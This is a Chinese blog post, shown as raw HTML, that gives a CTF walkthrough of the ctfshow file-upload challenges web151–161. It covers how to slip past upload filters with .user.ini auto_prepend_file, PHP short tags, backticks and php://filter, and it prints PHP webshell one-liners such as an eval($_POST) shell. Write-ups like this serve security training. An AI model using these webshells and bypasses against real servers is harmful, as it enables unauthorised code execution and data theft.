

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="j0ker">
  <meta name="keywords" content="">
  
    <meta name="description" content="ctfshow之文件上传web151upload.js会对上传的文件进行检查，可以先上传一张真的图片(.png)，再用burpsuite将png改为php,内容改成php代码，再命令执行即可。   也可以上传图片马，然后在burpsuie里将png改为php，再命令执行即可。 12用小点的图片和一句话木马，利用copy命令生成图片马copy shell.png&#x2F;b+shell.php&#x2F;a a.pn">
<meta property="og:type" content="article">
<meta property="og:title" content="ctfshow之文件上传">
<meta property="og:url" content="http://example.com/2022/02/06/ctfshow-upload/index.html">
<meta property="og:site_name" content="j0ker&#39;s blog">
<meta property="og:description" content="ctfshow之文件上传web151upload.js会对上传的文件进行检查，可以先上传一张真的图片(.png)，再用burpsuite将png改为php,内容改成php代码，再命令执行即可。   也可以上传图片马，然后在burpsuie里将png改为php，再命令执行即可。 12用小点的图片和一句话木马，利用copy命令生成图片马copy shell.png&#x2F;b+shell.php&#x2F;a a.pn">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220206200917084.png">
<meta property="og:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220206215218371.png">
<meta property="og:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220206220334001.png">
<meta property="og:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220206222508627.png">
<meta property="og:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220206222721766.png">
<meta property="og:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220206230340766.png">
<meta property="og:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220207142011547.png">
<meta property="og:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220207143149955.png">
<meta property="og:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220207143736974.png">
<meta property="article:published_time" content="2022-02-06T11:57:57.000Z">
<meta property="article:modified_time" content="2022-02-09T13:58:02.542Z">
<meta property="article:author" content="j0ker">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="文件上传">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2022/02/06/ctfshow-upload/image-20220206200917084.png">
  
  
  <title>ctfshow之文件上传 - j0ker&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/xm_custom/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>j0ker&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="ctfshow之文件上传">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-02-06 19:57" pubdate>
        2022年2月6日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.3k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      12 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">ctfshow之文件上传</h1>
            
            <div class="markdown-body">
              <h2 id="ctfshow之文件上传"><a href="#ctfshow之文件上传" class="headerlink" title="ctfshow之文件上传"></a>ctfshow之文件上传</h2><h3 id="web151"><a href="#web151" class="headerlink" title="web151"></a>web151</h3><p>upload.js会对上传的文件进行检查，可以先上传一张真的图片(.png)，再用burpsuite将png改为php,内容改成php代码，再命令执行即可。</p>
<img src="/2022/02/06/ctfshow-upload/image-20220206200917084.png" srcset="/img/loading.gif" lazyload class="">

<p>也可以上传图片马，然后在burpsuie里将png改为php，再命令执行即可。</p>
<figure class="highlight php"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><pre><code class="hljs php">用小点的图片和一句话木马，利用copy命令生成图片马<br>copy shell.png/b+shell.php/a a.png<br></code></pre></td></tr></table></figure>

<h3 id="web152"><a href="#web152" class="headerlink" title="web152"></a>web152</h3><p>后端会对Content-Type进行限制，但和上题的思路一样。</p>
<h3 id="web153"><a href="#web153" class="headerlink" title="web153"></a>web153</h3><p>这里对php后缀进行了限制，这里可以使用p牛的方法：<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html">user.ini文件构成php后门。</a></p>
<p>php.ini是php默认的配置文件，其中包括了很多php的配置。除了主 php.ini 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（<code>$_SERVER[&#39;DOCUMENT_ROOT&#39;]</code> 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。</p>
<p>而且，和php.ini不同的是，.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后，不需要重启服务器中间件，只需要等待user_ini.cache_ttl所设置的时间（默认为300秒），即可被重新加载。</p>
<p>php配置项的两个参数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">指定一个文件，自动包含在要执行的文件前<br>auto_append_file=a.png<br>    <br>指定一个文件，自动包含在要执行的文件后<br>auto_prepend_file=a.png<br></code></pre></td></tr></table></figure>

<p>先上传.user.ini文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">auto_prepend_file=a.png<br></code></pre></td></tr></table></figure>

<img src="/2022/02/06/ctfshow-upload/image-20220206215218371.png" srcset="/img/loading.gif" lazyload class="">

<p>接着上传a.png的马，成功利用。</p>
<img src="/2022/02/06/ctfshow-upload/image-20220206220334001.png" srcset="/img/loading.gif" lazyload class="">

<h3 id="web154"><a href="#web154" class="headerlink" title="web154"></a>web154</h3><p>和上题的思路一样，但上传马的时报错了，这里可能是把文件内容的php给禁用了，这里我们使用短标签进行绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?=</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;a&#x27;</span>]);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>成功上传马</p>
<img src="/2022/02/06/ctfshow-upload/image-20220206222508627.png" srcset="/img/loading.gif" lazyload class="">

<p>拿到flag</p>
<img src="/2022/02/06/ctfshow-upload/image-20220206222721766.png" srcset="/img/loading.gif" lazyload class="">

<h3 id="web155"><a href="#web155" class="headerlink" title="web155"></a>web155</h3><p>与上题思路一致</p>
<h3 id="web156"><a href="#web156" class="headerlink" title="web156"></a>web156</h3><p>和上题思路一致，但上传马的时候始终失败，另外过滤了’[‘字符,这里换了一个马。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?=</span>system(<span class="hljs-string">&quot;tac ../fla*&quot;</span>);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>



<img src="/2022/02/06/ctfshow-upload/image-20220206230340766.png" srcset="/img/loading.gif" lazyload class="">

<h3 id="web157"><a href="#web157" class="headerlink" title="web157"></a>web157</h3><p>和上题的思路一样，但这里过滤了分号，把分号去掉即可。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?=</span>system(<span class="hljs-string">&quot;tac ../fla*&quot;</span>)<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="web158"><a href="#web158" class="headerlink" title="web158"></a>web158</h3><p>与上题思路一致</p>
<h3 id="web159"><a href="#web159" class="headerlink" title="web159"></a>web159</h3><p>和上题思路一样，但这里把符号‘(’给过滤了，那么可以采用反引号来执行命令。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?=</span>`tac ../fla*`<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="web160"><a href="#web160" class="headerlink" title="web160"></a>web160</h3><p>和上题思路一样，但这里把反引号给过滤了，可以使用include命令去配合php伪协议进行读取。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">#a.png</span><br><span class="hljs-meta">&lt;?=</span><span class="hljs-keyword">include</span><span class="hljs-string">&quot;p&quot;</span>.<span class="hljs-string">&quot;hp://filter/convert.base64-encode/resource=../flag.p&quot;</span>.<span class="hljs-string">&quot;hp&quot;</span><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<img src="/2022/02/06/ctfshow-upload/image-20220207142011547.png" srcset="/img/loading.gif" lazyload class="" title="image-20220207142011547">

<p>再进行base64解码即可。</p>
<h3 id="web161"><a href="#web161" class="headerlink" title="web161"></a>web161</h3><p>和上题思路一样，但这次.user.ini文件上传失败，但加了文件头就上传成功了。</p>
<img src="/2022/02/06/ctfshow-upload/image-20220207143149955.png" srcset="/img/loading.gif" lazyload class="" title="image-20220207143149955">

<p>接着上传图片马</p>
<img src="/2022/02/06/ctfshow-upload/image-20220207143736974.png" srcset="/img/loading.gif" lazyload class="" title="image-20220207143736974">

<p>再进行base64解码即可。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                      <a class="hover-with-bg" href="/categories/CTF/Web/">Web</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Web/">Web</a>
                    
                      <a class="hover-with-bg" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">文件上传</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/02/07/ctfshow-sql-injection/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">ctfshow之sql注入</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/01/14/day03/">
                        <span class="hidden-mobile">day03</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <br><span id="timeDate">天数载入中</span><span id="times">...</span><br> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        赣ICP证2021009463号
      </a>
    </span>
    
      
        <span>
          <a
            href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=2021009463"
            rel="nofollow noopener"
            class="beian-police"
            target="_blank"
          >
            
              <span style="visibility: hidden; width: 0">|</span>
              <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
            
            <span>赣ICP备2021009463号</span>
          </a>
        </span>
      
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>














  
<script src="/xm_custom/custom.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
